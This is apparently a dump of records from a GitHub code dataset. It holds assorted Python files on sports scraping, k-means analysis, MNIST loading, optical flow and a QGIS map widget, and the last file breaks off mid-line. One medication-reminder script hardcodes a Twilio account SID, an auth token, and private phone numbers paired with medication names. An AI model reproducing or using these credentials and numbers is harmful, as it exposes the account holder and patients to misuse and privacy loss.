list(df.groupby('Tm')['PA'].nlargest(9).reset_index()['level_1'].values)\n roster_df = df.iloc[roster_indices]\n roster_df = roster_df[roster_df['Tm'].isin(abbreviations)]\n\n return roster_df\n\nget_player_batting_df(2018)\n\n\n","repo_name":"wideet/mlb_project","sub_path":"scripts/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3459372592","text":"\nimport json\n\n\nclass University(object):\n def __init__(self):\n with open(\"base_university.json\", \"r\") as read_file:\n data = json.load(read_file)\n self.countOfStudents = data['countOfStudents']\n self.ourEducationPlan = data['ourEducationPlan']\n self.internetCost = data['internetCost']\n self.accountantSalary = data['accountantSalary']\n self.cost1C = data['cost1C']\n self.sysAdminSalary = data['sysAdminSalary']\n self.methodistSalary = data['methodistSalary']\n self.inflation = data['inflation']\n self.durationOfEducation = data['durationOfEducation']\n self.lectorSalaryPerHour = data['lectorSalaryPerHour']\n\n\n def printMe(self):\n print(self.countOfStudents)\n\n\nclass Offline(University):\n def __init__(self):\n super().__init__()\n with open(\"offline_university.json\", \"r\") as read_file:\n data = json.load(read_file)\n self.costOfPlace = data['costOfPlace']\n self.securitySalary = data['securitySalary']\n self.cloakroomSalary = data['cloakroomSalary']\n self.updateProjectors = data['updateProjectors']\n self.chancelleryCost = data['chancelleryCost']\n self.paperCost = data['paperCost']\n self.salaryOfCleaner = data['salaryOfCleaner']\n\n\nclass Online(University):\n def __init__(self):\n super().__init__()\n with open(\"online_university.json\", \"r\") as read_file:\n data = json.load(read_file)\n self.elearningHost = data['elearningHost']\n self.zoomAccounts = data['zoomAccounts']\n self.cloudRent = data['cloudRent']\n\n","repo_name":"James-Bolt/Computer_graphics_task_1","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4406578079","text":"import os\nimport numpy as np\nfrom Applications.kmeans.kmeansfunctions import HistoryMean, CalculateDistanceD, CalculateCenterListD, \\\n CalculateCenterListDQ, CalculateDistanceDQ\nfrom CutAndExport.Histogram import HistogramWithMinMaxList\n\n#################################################################\nk = 32\nenergy = \"1500\"\nreadfileName = \"FT0\"\n\n#################################################################\nos.chdir(\"../../\")\ndim = 12\n\nfor n in range(0, 21):\n data = np.loadtxt(\"_DataFolder/kmeans/cs/csq/{1}-{0}-{2}.csv\".format(energy, readfileName, n), delimiter=',')\n kmeansData = np.loadtxt(\"_DataFolder/kmeans/kmeans/csq/{1}-{0}-{2}-all.csv\".format(energy, readfileName, n), delimiter=',').astype(int)\n distanceAll = []\n for i in range(0, len(kmeansData)):\n centersAll = CalculateCenterListDQ(data, kmeansData[i], k)\n distanceAll.append(CalculateDistanceDQ(data, kmeansData[i], centersAll))\n distanceAllArray = np.array(distanceAll)\n allMean = np.mean(distanceAllArray, axis=0)\n np.savetxt(\"_DataFolder/kmeans/distances/csq/{1}-{0}-{2}-meandist.csv\".format(energy, readfileName, n), allMean, delimiter=',', fmt='%f')\n res1 = HistogramWithMinMaxList(allMean, [2000, 20000], 50)\n print(res1.listCount)\n","repo_name":"NBAlexis/MLAnalysis","sub_path":"Applications/kmeans/qktodistance.py","file_name":"qktodistance.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29038811238","text":"import os\nfrom twilio.rest import Client\nimport sched, time\nimport schedule\n\n\nhostPhoneNumber = \"+12246287287\"\nsafteyPhoneNumber = \"+17038191285\"\n# Your Account Sid and Auth Token from twilio.com/console\n# and set the environment variables. See http://twil.io/secure\naccount_sid = 'AC76ba72e79d8e3665d3bd460d944d77d7'\nauth_token = '99717eabde4883558063829e8bd27b11'\nclient = Client(account_sid, auth_token)\n\n\ndef testPhoneNumber(phone_number):\n if len(phone_number) == 10:\n phone_number = \"+1\" + phone_number\n return True\n else: \n return False\n \noptiInNumbers = [\"6188895954\", \"6188895458\"]\nprint(optiInNumbers)\n\ndef confirmationThatMessagesWentOut():\n alertMessage = client.messages \\\n .create( \n body= \"The message went out!\",\n from_= hostPhoneNumber,\n to= safteyPhoneNumber\n )\n\ndef alert_User(phone_number, Name_of_Medication):\n if testPhoneNumber(phone_number):\n alertMessage = client.messages \\\n .create( \n body= \"This is a reminder for you to take your \" + Name_of_Medication + \" medication\",\n from_= hostPhoneNumber,\n to= phone_number\n )\n confirmationThatMessagesWentOut()\n else : \n print(\"there was an error with the phone number\")\n\n\ndef enroll_Patient():\n for number in optiInNumbers:\n if testPhoneNumber(number):\n alertMessage = client.messages \\\n .create( \n body= \"This is an alert that you will be receiving text alerts to take you medication\",\n from_= hostPhoneNumber,\n to= number\n )\n else: \n print(\"there was an error with the phone number\")\n\n\n\ndef settupTime(interval, date , time):\n switch()\n# for number in optiInNumbers:\n# schedule.every(5).seconds.do(alert_User,number,\"advil\")\n \n\n# operator to run the commands\n# enroll_Patient()\n\nschedule.every().day.at(\"08:00\").do(alert_User,\"6188895954\",\"Atorvastatin\")\nschedule.every().day.at(\"08:00\").do(alert_User,\"6188895954\",\"Blood Pressure Medication \")\nschedule.every().day.at(\"08:00\").do(alert_User,\"6188895458\",\"Atorvastatin\")\nschedule.every().day.at(\"16:00\").do(alert_User,\"6182970223\",\"Caffeine + AM Meds\")\n# need to be added once Pardeep sends me the info \nschedule.every().day.at(\"16:00\").do(alert_User,\"618512\",\"Caffeine + AM Meds\")\nschedule.every().day.at(\"16:00\").do(alert_User,\"6182970223\",\"Caffeine + AM Meds\")\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"vrainuncensored/adhere","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70432244213","text":"from distutils.core import setup\r\n\r\nREQUIRED_PACKAGES = [\r\n \"pandas>=1.3.5\"\r\n]\r\n\r\n\r\nsetup(\r\n name='secure_dataframe', # How you named your package folder (MyLib)\r\n packages=['secure_dataframe'], # Chose the same as \"name\"\r\n version='0.0.9', # Start with a small number and increase it with every change you make\r\n license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository\r\n description='A way to secure and filter dataframe on pandas', # Give a short description about your library\r\n author='Pedro Pinho', # Type in your name\r\n author_email='pepeupepeo@gmail.com', # Type in your E-Mail\r\n url='https://github.com/Grayfados/SecureDataframe', # Provide either the link to your github or to your website\r\n download_url=\"https://github.com/Grayfados/SecureDataframe/archive/refs/tags/v0.0.2.tar.gz\",\r\n install_requires=REQUIRED_PACKAGES,\r\n classifiers=[\r\n 'Development Status :: 3 - Alpha', # Chose either \"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\" as the current state of your package\r\n 'Intended Audience :: Developers', # Define that your audience are developers\r\n 'Environment :: Plugins',\r\n 'License :: OSI Approved :: MIT License', # Again, pick a license\r\n 'Programming Language :: Python :: 3.7',\r\n 'Programming Language :: Python :: 3.8',\r\n 'Programming Language :: Python :: 3.9',\r\n ],\r\n)\r\n","repo_name":"Grayfados/SecureDataframe","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71948508212","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 12 23:57:09 2018\n\n@author: arfas\n\"\"\"\n\nimport numpy as np\n\npy1=0.33\npy2=0.67 \n\nm1=[[5.01],[3.42]] \nm2=[[6.26],[2.87]] \n\nm1=np.array(m1) \nm2=np.array(m2) \n\ncm1=[[0.122, 0.098],[0.098, 0.142]] \ncm1=np.array(cm1) \ncm2=[[0.435, 0.121],[0.121, 0.110]] \ncm2=np.array(cm2) \n\nmodcm1=np.linalg.det(cm1) \nmodcm2=np.linalg.det(cm2) \n\nxt=[[6.75],[4.25]] \nxt=np.array(xt) \n\nmtsub1=np.subtract(xt, m1) \nmtsub2=np.subtract(xt, m2) \n\n\nf1=((1/((np.sqrt(2*np.pi))*np.power(modcm1, (1/2))))(np.exp(-((np.matmul(np.matmul(mtsub1.transpose(), (1/cm1)), mtsub1))/2))))\nf2=((1/((np.sqrt(2*np.pi))*np.power(modcm2, (1/2))))(np.exp(-((np.matmul(np.matmul(mtsub2.transpose(), (1/cm2)), mtsub2))/2))))\n\n#calculates posterior probability for class c1\nPpop1= (f1*py1)/((f1*py1)+(f2*py2))\n\n#calculates posterior probability for class c2\nPpop2= (f2*py2)/((f1*py1)+(f2*py2))","repo_name":"arfas/Machine-Learning","sub_path":"untitled3.py","file_name":"untitled3.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15936808471","text":"\nimport numpy as np\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.platform import test\nclass ProtoTest(test.TestCase):\n def _testLargeProto(self):\n a = constant_op.constant(np.zeros([1024, 1024, 17]))\n gdef = a.op.graph.as_graph_def()\n serialized = gdef.SerializeToString()\n unserialized = ops.Graph().as_graph_def()\n unserialized.ParseFromString(serialized)\n self.assertProtoEquals(unserialized, gdef)\nif __name__ == \"__main__\":\n test.main()\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_2/proto_test.py.transformed.py","file_name":"proto_test.py.transformed.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40086867284","text":"import cv2\nimport numpy as np\n\nimg1 = cv2.imread('../Img/stitching/dog_a.jpg', cv2.IMREAD_COLOR)\nimg2 = cv2.imread('../Img/stitching/dog_b.jpg', cv2.IMREAD_COLOR)\n\nimg1 = cv2.resize(img1, dsize=(1024, 768))\nimg2 = cv2.resize(img2, dsize=(1024, 768))\nimg_list = [img1, img2]\n\nprev_pts = None\nprev_gray_frame = None\ntracks = None\nidx = 0\n\nwhile True:\n if len(img_list)-1 < idx:\n idx = 0\n\n frame = img_list[idx].copy()\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n if prev_pts is not None:\n pts, status, errors = cv2.calcOpticalFlowPyrLK(prev_gray_frame, gray_frame, prev_pts, None, winSize=(15, 15),\n maxLevel=5, criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03)) # Tracking 이 종료되는 지점 설정\n good_pts = pts[status == 1]\n if tracks is None:\n tracks = good_pts\n else:\n tracks = np.vstack((tracks, good_pts))\n for p in tracks:\n cv2.circle(frame, (p[0], p[1]), 3, (0, 255, 0), -1)\n else:\n pts = cv2.goodFeaturesToTrack(gray_frame, 500, 0.05, 10)\n pts = pts.reshape(-1, 1, 2)\n\n idx += 1\n\n prev_pts = pts\n prev_gray_frame = gray_frame\n\n cv2.imshow('Pyramid Lucas-Kanade', frame)\n key = cv2.waitKey() & 0xff\n if key == 27:\n break\n if key == ord('c'):\n tracks = None\n prev_pts = None\n idx = 0\n\ncv2.destroyAllWindows()\n\n\ndef display_flow(img, flow, stride=50):\n for index in np.ndindex(flow[::stride, ::stride].shape[:2]):\n pt1 = tuple(i*stride for i in index)\n delta = flow[pt1].astype (np. int32)[::-1]\n pt2 = tuple(pt1 + 10*delta)\n if 2 <= cv2.norm(delta) <= 10:\n cv2.arrowedLine(img, pt1[::-1], pt2[::-1], (0, 0, 255), 2, cv2.LINE_AA, 0, 0.2)\n\n\nprev = None\ncount = 0\n\nwhile True:\n if len(img_list) - 1 < count:\n count = 0\n\n frame = img_list[count].copy()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if prev is None:\n prev = gray\n else:\n flow = cv2.calcOpticalFlowFarneback(prev, gray, flow=None,\n pyr_scale=0.7, levels=3, winsize=50, iterations=3,\n poly_n=5, poly_sigma=1.1,\n flags=cv2.OPTFLOW_FARNEBACK_GAUSSIAN)\n display_flow(frame, flow)\n prev = gray\n\n cv2.imshow('Gunner Farneback', frame)\n count += 1\n key = cv2.waitKey() & 0xFF\n if key == 27:\n break\n if key == ord('c'):\n break\n\ncv2.destroyAllWindows()\n\n\nprev_frame = cv2.cvtColor(img_list[0], cv2.COLOR_BGR2GRAY)\nflow_DualTVL1 = cv2.createOptFlow_DualTVL1()\ncount = 0\n\nwhile True:\n if len(img_list) - 1 < count:\n count = 0\n\n frame = img_list[count].copy()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n if not flow_DualTVL1.getUseInitialFlow():\n opt_flow = flow_DualTVL1.calc(prev_frame, gray, None)\n flow_DualTVL1.setUseInitialFlow(True)\n else:\n opt_flow = flow_DualTVL1.calc(prev_frame, gray, opt_flow)\n\n display_flow(frame, opt_flow)\n\n cv2.imshow('Dual TVL1', frame)\n prev_frame = gray.copy()\n count += 1\n key = cv2.waitKey() & 0xFF\n if key == 27:\n break\n if key == ord('c'):\n break\n\ncv2.destroyAllWindows()\n","repo_name":"dgyoo-AI/Industrial-AI","sub_path":"Programming/산업컴퓨터비전실제/13주차/프로그래밍과제#4.py","file_name":"프로그래밍과제#4.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29626953016","text":"import numpy as np # 数据处理 Data processing\nimport pandas as pd # 数据处理, CSV文件 I/O (例如 pd.read_csv)\nfrom torch.utils.data import Dataset # 数据载入 Data loading\nfrom torch.utils.data.sampler import SubsetRandomSampler # 数据预处理 Data preprocessing\n\ntrain_set = pd.read_csv('digit-recognizer/train.csv') # 读取训练数据 Load training data\ntest_set = pd.read_csv('digit-recognizer/test.csv') # 读取测试数据 Load testing data\n\nVALID_SIZE = 0.1 # 用于分割验证集的数据比例 The proportion of validation data\n\nnum_train = len(train_set) # 训练集数据个数 42000 The number of train data\nindices = list(range(num_train)) # 生成一列序号,从0-41999\nnp.random.shuffle(indices) # 随机排列序号\nsplit = int(np.floor(VALID_SIZE * num_train)) # 验证集数量 4200\ntrain_indices, valid_indices = indices[split:], indices[:split] # 分割验证集\n\ntrain_sampler = SubsetRandomSampler(train_indices)\nvalid_sampler = SubsetRandomSampler(valid_indices)\n\nprint(f'training set length: {len(train_indices)}') # 37800\nprint(f'validation set length: {len(valid_indices)}') # 4200\n\n\nclass DatasetMNIST(Dataset):\n def __init__(self, data, transform=None, labeled=True):\n self.data = data\n self.transform = transform\n self.labeled = labeled\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index): # 重写,定义数据载入行为\n item = self.data.iloc[index]\n if self.labeled: # 处理已标注数据\n x = item[1:].values.astype(np.uint8).reshape((28, 28)) # 图像像素数据\n y = item[0] # 标注数字\n else: # 处理未标注数据(缺少标注列,dimension不同,本文选择分别处理)\n x = item[0:].values.astype(np.uint8).reshape((28, 28)) # 图像像素数据\n y = 0 # 仅用于占位,数值不会被使用也不影响行为\n\n if self.transform is not None:\n x = self.transform(x)\n\n return x, y\n","repo_name":"sccdog/Digit-recognizer","sub_path":"2_PytorchCNN/Dataloader.py","file_name":"Dataloader.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40833535964","text":"import time\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom models import Summary, IDMappingManual\nfrom collections import namedtuple\n\n\nclass DBHandler(object):\n def __init__(self):\n self.engine = create_engine('mysql+mysqlconnector://lolhfdev2:lolhfdev2@localhost:3306/lolhfdev2')\n self.DBSession = sessionmaker(bind=self.engine)\n\n def initial_table(self, table_model):\n session = self.DBSession()\n session.query(table_model).delete()\n session.commit()\n session.close()\n\n def save_data(self, data_list, table_model):\n self.initial_table(table_model)\n all_data = [table_model(**data) for data in data_list]\n # for item in all_data:\n # print(item.player_name, '=>', item.game_id)\n try:\n session = self.DBSession()\n session.add_all(all_data)\n # session.bulk_save_objects(all_data)\n session.commit()\n session.close()\n except Exception as e:\n print(e)\n # for item in all_data:\n # try:\n # session = self.DBSession()\n # session.add(item)\n # session.commit()\n # session.close()\n # except Exception as e:\n # print(e)\n\n def get_idmappingmanual_gameid(self):\n session = self.DBSession()\n gameids = session.query(IDMappingManual.game_id).filter(IDMappingManual.enable == 1).all()\n tmplist = []\n for gameid in gameids:\n tmplist.append(gameid[0])\n session.close()\n return tmplist\n\n def update_summary(self):\n self.initial_table(Summary)\n time.sleep(10)\n session = self.DBSession()\n sql = '''\n insert into summary\n select distinct\n COALESCE(c.player_name,'路人') as 'player_name'\n ,COALESCE(c.player_country,'unknown') as 'player_country'\n ,COALESCE(c.player_team_short_name,'路人') as 'player_team_short_name'\n ,COALESCE(c.player_team_league,'路人') as 'player_team_league'\n ,COALESCE(c.player_place,'路人') as 'player_place'\n ,a.*\n from gameidinfo a\n left JOIN\n (\n select game_id,player_name\n from idmapping\n where game_id not in\n (select game_id from idmappingmanual)\n UNION\n select game_id,player_name\n from idmappingmanual\n ) b\n on a.game_id=b.game_id\n left join\n (\n select *\n from player\n where player_name not in (select player_name from player group by player_name having count(*)>1)\n and player_name not in (select player_name from playermanual)\n UNION\n select * from playermanual\n ) c\n ON b.player_name=c.player_name\n '''\n session.execute(sql)\n session.commit()\n sql = '''update summary set player_team_short_name='' WHERE player_team_short_name='路人';'''\n session.execute(sql)\n session.commit()\n sql = '''update summary set player_country='' where player_country='unknown';'''\n session.execute(sql)\n session.commit()\n print('update summary')\n session.close()\n","repo_name":"MrShepherd/lolhf2","sub_path":"dbhandler.py","file_name":"dbhandler.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105656991","text":"# Copyright (c) 2011-2013, ImageCat Inc.\n#\n# This program is free software: you can redistribute it and/or modify \n# it under the terms of the GNU Affero General Public License as published by \n# the Free Software Foundation, either version 3 of the License, or \n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, \n# but WITHOUT ANY WARRANTY; without even the implied warranty of \n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License \n# along with this program. If not, see .\r\n#\n\"\"\"\r\nWidget (Panel) for result review\r\n\"\"\"\r\nfrom os.path import exists \r\n\r\nfrom PyQt4.QtGui import QWidget, QFileDialog, QDialog, QDialogButtonBox\r\nfrom PyQt4.QtCore import Qt, QObject, QPoint, QRect, pyqtSlot\r\nfrom PyQt4.QtXml import QDomDocument\r\nfrom qgis.gui import QgsMapCanvas, QgsMapCanvasLayer, \\\r\n QgsMapToolPan, QgsMapToolZoom, QgsMapToolEmitPoint, \\\r\n QgsRendererV2PropertiesDialog\r\nfrom qgis.core import QGis, QgsMapLayerRegistry, QgsCoordinateReferenceSystem, \\\r\n QgsCoordinateTransform, QgsFeature, QgsRectangle, QgsPoint, \\\r\n QgsStyleV2, QgsFeatureRendererV2\r\n\r\nfrom utils.shapefile import load_shapefile, layer_field_index, layer_features\r\nfrom sidd.constants import ExportTypes, ExtrapolateOptions\r\n\r\nfrom ui.constants import logUICall, get_ui_string, UI_PADDING\r\nfrom ui.dlg_result import DialogResult\r\nfrom ui.qt.wdg_result_ui import Ui_widgetResult\r\nfrom ui.dlg_search_feature import DialogSearchFeature\r\n\r\nclass WidgetResult(Ui_widgetResult, QWidget):\r\n \"\"\"\r\n Widget (Panel) for result review\r\n \"\"\"\r\n \r\n ''' buffer around clicked point for point in polygon query ''' \r\n SEARCH_BUFFER = 20.0\r\n ''' supported export formats '''\r\n EXPORT_FORMATS = {\r\n get_ui_string(\"app.extension.shapefile\"):ExportTypes.Shapefile,\r\n #get_ui_string(\"app.extension.kml\"):ExportTypes.KML,\r\n #get_ui_string(\"app.extension.nrml\"):ExportTypes.NRML,\r\n get_ui_string(\"app.extension.csv\"):ExportTypes.CSV,\r\n };\r\n ''' enumeration of Layer to be previewed '''\r\n EXPOSURE, SURVEY, POP_GRID, FOOTPRINT, ZONES = range(5);\r\n ''' name for Layer to be previewed '''\r\n LAYER_NAMES = [\r\n get_ui_string(\"widget.result.layer.exposure\"), \r\n get_ui_string(\"widget.result.layer.survey\"),\r\n get_ui_string(\"widget.result.layer.popgrid\"),\n get_ui_string(\"widget.result.layer.footprint\"), \r\n get_ui_string(\"widget.result.layer.zones\"),\n ]; \r\n LAYER_STYLES = [\r\n '',\r\n '',\r\n '',\n '',\r\n '',\n ]\r\n \r\n # constructor / destructor\r\n ###############################\r\n \r\n def __init__(self, app):\r\n \"\"\"\n constructor\n - initialize UI elements\n - connect UI elements to callback \n \"\"\"\n super(WidgetResult, self).__init__()\r\n self.ui = Ui_widgetResult()\r\n self.ui.setupUi(self)\r\n \r\n # create canvas\r\n self.canvas = QgsMapCanvas(self.ui.widget_map)\r\n self.canvas.setGeometry(\r\n 0, # x\r\n self.ui.widget_map_menu_l.x()+self.ui.widget_map_menu_l.height(), # y \r\n self.ui.widget_map.width() - 2*UI_PADDING, # width\r\n self.ui.widget_map.width() - 2*UI_PADDING # height\r\n )\n \r\n self.canvas.setCanvasColor(Qt.white)\r\n self.canvas.enableAntiAliasing(True)\r\n self.canvas.mapRenderer().setProjectionsEnabled(True)\r\n self.canvas.mapRenderer().setDestinationCrs(QgsCoordinateReferenceSystem(4326, QgsCoordinateReferenceSystem.PostgisCrsId))\n self.canvas.zoomNextStatusChanged.connect(self.checkRendering)\r\n self.canvas.xyCoordinates.connect(self.currentLocation)\n self.registry = QgsMapLayerRegistry.instance()\n \n self.map_layers = [None] * len(self.LAYER_NAMES)\r\n self.map_layer_renderer = [None] * len(self.LAYER_NAMES)\r\n for idx, str_style in enumerate(self.LAYER_STYLES):\r\n rdoc = QDomDocument(\"renderer\")\r\n rdoc.setContent(str_style) \r\n self.map_layer_renderer[idx] = QgsFeatureRendererV2.load(rdoc.firstChild().toElement())\r\n\r\n # populate export list\r\n self.ui.cb_export_format.clear()\r\n for export_format in self.EXPORT_FORMATS.keys():\r\n self.ui.cb_export_format.addItem(export_format)\r\n \r\n # style object required for QgsRendererV2PropertiesDialog\r\n self.style = QgsStyleV2()\r\n \r\n # create the map tools\r\n self.toolPan = QgsMapToolPan(self.canvas)\r\n self.toolZoomIn = QgsMapToolZoom(self.canvas, False) # false = in\r\n self.toolZoomOut = QgsMapToolZoom(self.canvas, True) # true = out\r\n self.toolInfo = QgsMapToolEmitPoint(self.canvas)\r\n self.toolInfo.canvasClicked.connect(self.showInfo)\r\n self.canvas.setMapTool(self.toolPan)\r\n \r\n # additional \r\n self.dlgResultDetail = DialogResult()\r\n self.dlgResultDetail.setModal(True)\r\n\r\n # set link to application main controller\r\n self.app = app\r\n \r\n # reset project\r\n self._project = None\r\n \r\n # default export setting\r\n self.export_format = ExportTypes.Shapefile\r\n \r\n # connect slots (ui event)\r\n self.ui.btn_zoom_full.clicked.connect(self.mapZoomFull)\r\n self.ui.btn_zoom_in.clicked.connect(self.mapZoomIn)\r\n self.ui.btn_zoom_out.clicked.connect(self.mapZoomOut)\n self.ui.btn_stop.clicked.connect(self.stopRendering)\r\n self.ui.btn_zoom_layer.clicked.connect(self.mapZoomLayer) \r\n self.ui.btn_pan.clicked.connect(self.mapPan)\r\n self.ui.btn_theme.clicked.connect(self.mapEditTheme)\r\n self.ui.btn_info.clicked.connect(self.mapIdentify)\n \n self.ui.btn_zoom_to_feature.clicked.connect(self.searchFeature)\r\n \r\n self.ui.cb_export_format.currentIndexChanged[str].connect(self.exportFormatChanged)\r\n self.ui.btn_export.clicked.connect(self.exportData)\r\n self.ui.btn_export_select_path.clicked.connect(self.selectExportFile)\r\n\n @pyqtSlot(QgsPoint)\n def currentLocation(self, point):\n self.app.updateMapLocation(point.x(),point.y())\n #self.canvas.mouseMoveEvent(mouseEvent)\n \n\r\n # UI event handling calls (Qt slots)\r\n ###############################\r\n @pyqtSlot(QObject)\r\n def resizeEvent(self, event):\r\n \"\"\" handle window resize \"\"\" \r\n # find left coordinate for right side panels\r\n x_right_side = self.width()-self.ui.widget_export.width()-UI_PADDING\r\n # adjust right side panels\r\n self.ui.widget_export.move(x_right_side, self.ui.widget_map.y()+30)\r\n self.ui.widget_dq_test.move(x_right_side, self.ui.widget_export.y()+self.ui.widget_export.height()+UI_PADDING)\r\n # adjust map panel (left side) \r\n self.ui.widget_map.resize(x_right_side-UI_PADDING, self.height()-2*UI_PADDING)\r\n # adjust map canvas within the map panel \r\n map_top = self.ui.widget_map_menu_l.x()+self.ui.widget_map_menu_l.height()+UI_PADDING \r\n self.canvas.resize(\r\n x_right_side-UI_PADDING, # same width as self.ui.widget_map\r\n self.ui.widget_map.height()-map_top-2*UI_PADDING) # height \r\n # adjust map menu\r\n self.ui.widget_map_menu_r.move(\r\n self.ui.widget_map.width()-self.ui.widget_map_menu_r.width(), # right align with map panel \r\n 0)\r\n # logo\n self.ui.lb_gem_logo.move(self.width()-self.ui.lb_gem_logo.width(), self.ui.lb_gem_logo.y())\n\r\n @logUICall\r\n @pyqtSlot()\r\n def mapPan(self):\r\n \"\"\" event handler for btn_pan - pan map \"\"\"\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n self.canvas.setMapTool(self.toolPan)\n\r\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomIn(self):\r\n \"\"\" event handler for btn_zoom_in - zoom in on map \"\"\"\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n self.canvas.setMapTool(self.toolZoomIn)\n\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomOut(self):\r\n \"\"\" event handler for btn_zoom_out - zoom out on map \"\"\"\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n self.canvas.setMapTool(self.toolZoomOut)\n\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomFull(self):\r\n \"\"\" event handler for btn_zoom_full - zoom to full map \"\"\"\r\n self.canvas.zoomToFullExtent()\n\n def checkRendering(self, changed):\n self.canvas.setRenderFlag(True)\n \n @logUICall\n @pyqtSlot()\n def stopRendering(self): \n self.canvas.setRenderFlag(False)\n\r\n @logUICall\r\n @pyqtSlot()\r\n def mapZoomLayer(self):\r\n self.canvas.unsetMapTool(self.toolInfo)\r\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n self.zoomToLayer(self.map_layers[self.LAYER_NAMES.index(cur_layer_name)])\r\n \r\n @logUICall\r\n @pyqtSlot()\r\n def mapEditTheme(self):\r\n \"\"\" event handler for btn_edit - identify item on map \"\"\"\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n try:\r\n cur_layer_idx = self.LAYER_NAMES.index(cur_layer_name)\n \n # build layer render property Dialog for selected layer \r\n dlg_render = QDialog()\n dlg_render.setWindowTitle(get_ui_string('widget.result.renderer.settings'))\n dlg_render.setModal(True)\n dlg_render.setFixedSize(530, 370)\n dlg_render.renderer = QgsRendererV2PropertiesDialog(self.map_layers[cur_layer_idx], self.style, True)\n dlg_render.renderer.setParent(dlg_render) \n dlg_render.renderer.setGeometry(QRect(10, 10, 510, 325))\n dlg_render.buttonBox = QDialogButtonBox(dlg_render)\n dlg_render.buttonBox.setGeometry(QRect(10, 335, 510, 25))\n dlg_render.buttonBox.setStandardButtons(QDialogButtonBox.Cancel|QDialogButtonBox.Ok)\n dlg_render.buttonBox.accepted.connect(dlg_render.accept)\n dlg_render.buttonBox.accepted.connect(dlg_render.renderer.onOK)\n dlg_render.buttonBox.rejected.connect(dlg_render.reject)\n dlg_render.setVisible(True)\n\n # get user input and update renderer\r\n answer = dlg_render.exec_()\r\n if answer == QDialog.Accepted:\r\n self.map_layer_renderer[cur_layer_idx] = None\r\n self.map_layer_renderer[cur_layer_idx] = self.map_layers[cur_layer_idx].rendererV2().clone() \r\n self.canvas.refresh()\r\n dlg_render.destroy()\r\n del dlg_render\r\n except Exception as err:\n # thematic is not-critical, allow continue on exception\r\n logUICall.log(str(err), logUICall.WARNING)\r\n\r\n @logUICall\r\n @pyqtSlot()\r\n def searchFeature(self): \r\n cur_layer_name = self.ui.cb_layer_selector.currentText()\n if cur_layer_name.isEmpty():\n return\r\n try:\r\n cur_layer_idx = self.LAYER_NAMES.index(cur_layer_name) \r\n layer = self.map_layers[cur_layer_idx]\r\n fields = []\r\n for fidx in layer.dataProvider().fields():\r\n fields.append(layer.dataProvider().fields()[fidx].name())\r\n dlg_search = DialogSearchFeature(fields) \r\n answer = dlg_search.exec_()\r\n if answer == QDialog.Accepted:\r\n extent = self.findFeatureExtentByAttribute(layer, dlg_search.attribute, dlg_search.value)\r\n if extent is not None:\r\n self.zoomToExtent(extent)\r\n else:\r\n logUICall.log(get_ui_string(\"widget.result.info.notfound\"), logUICall.WARNING)\r\n dlg_search.destroy()\r\n except Exception as err:\r\n # thematic is not-critical, allow continue on exception\n logUICall.log(str(err), logUICall.WARNING)\r\n \r\n @logUICall\r\n @pyqtSlot()\r\n def mapIdentify(self):\r\n \"\"\" \r\n event handler for btn_info \r\n This only enables map querying, method connected to canvasClicked signal does\r\n the actual point-polygon query \r\n \"\"\"\n self.canvas.setMapTool(self.toolInfo)\r\n\r\n @logUICall\r\n @pyqtSlot()\r\n def selectExportFile(self):\r\n \"\"\"\r\n event handler for btn_export_select_path \r\n - open save file dialog box to select file name for export \r\n \"\"\"\r filename = QFileDialog.getSaveFileName(self,\r\n 